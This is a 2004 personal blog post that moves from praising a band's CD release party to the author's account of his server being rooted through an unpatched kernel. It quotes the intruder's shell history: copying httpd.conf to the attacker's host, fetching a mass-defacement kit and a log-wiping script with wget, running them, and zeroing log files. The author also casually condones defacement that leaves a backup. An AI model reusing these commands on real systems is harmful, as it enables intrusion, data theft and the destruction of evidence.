Never been one to let the carrier drop

Well, a day of good and bad spots.

First of all, let me just say, the U.S.E. CD release party _rocked_! I realize very few of my friends list lives in Seattle, and of those who do, most wouldn’t ever do anything as peblean as listening to U.S.E., but I don’t care. It rocked. If you like the B-52s, or 80s pop in general, their CD is well worth the $12. Those of you not in the SeaTac area can buy it at their web site.

No, they’re not paying me to plug them. 😉 They’re just really good. And their music has hope – something that I’ve been missing. 😉

Anyway, second of all, Curious warned me and I was a bad Sheer and didn’t listen.. the kernel on sheer.us had two known paths to root from nonpriv’d users.. and I got owned, by
aarkan@rachacuca.homelinux.com.

A excerpt of the .bash_history, for those of you who like such things, is below:

who
ps aux
cd /usr/local/apache/conf
ls
who
ftp ftp.grupong.v10.com.br
ftp ftp.grupong.v10.com.br
ftp rachacuca.homelinux.com
ftp rachacuca.homelinux.com
scp httpd.conf aarkan@rachacuca.homelinux.com
scp httpd.conf aarkan@rachacuca.homelinux.com:/home/aarkan
cd
cd /root
cd .ssh
ls
rm know_hosts
cat /dev/null > known_hosts
cd /tmp
cd /home
ls
cd kenny
ls
cd ..
ls
cd netlogin
ls
cd ..
lls
ls
cd
cd /
mkdir mass
cd mass
wget www.geocities.com/xferror/mass.tgz
wget rachacuca.homelinux.com/NG/index.html
uname -a
wget rachacuca.homelinux.com/NG/index.html
rm index.html
mv index.html.1 index.kmg
tar zxvf mass.tgz
./mass /home
chmod 777 mass
chmod 777 mass2
chmod 777 mass3
cd /usr/local/apache/logs
ls
cat /dev/null > *
ls -l
cd /mass
wget rachacuca.homelinux.com/NG/limpalog.sh
chmod 777 limpalog.sh
./limpalog.sh /usr/local/apache/logs
ls -l /usr/local/apache/logs
./limpalogs.sh /var/logs
./limpalog.sh /var/log
./limpalog.sh /var/log/httpd
./mass /home
./mass1 /home
./mass2 /home
./mass3 /home
rm brk2.zip
rm bind.zip
rm -rf /mass

Anyway, normally I’d be completely cool with this – but he didn’t leave the old index.html’s renamed, so I’m somewhat annoyed at him.

Look, security can be a game of chess, fun for both sides – or it can be a war, involving cops and thugs and jail time and stuff. If no damage is done, it’s a lot more likely to stay the former – fun for everyone.

Hackers, ALWAYS back up waht you deface. Luckily, the wayback machine had most of what was lost (I hadn’t done a backup in forever. Bad sheer number 2.. )

Anyway, so right now I’m slowly progressing through the PITA of upgrading every potentially vulnerable service..

This entry was posted on Sunday, April 4th, 2004 at 11:46 am and is filed under Uncategorized. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.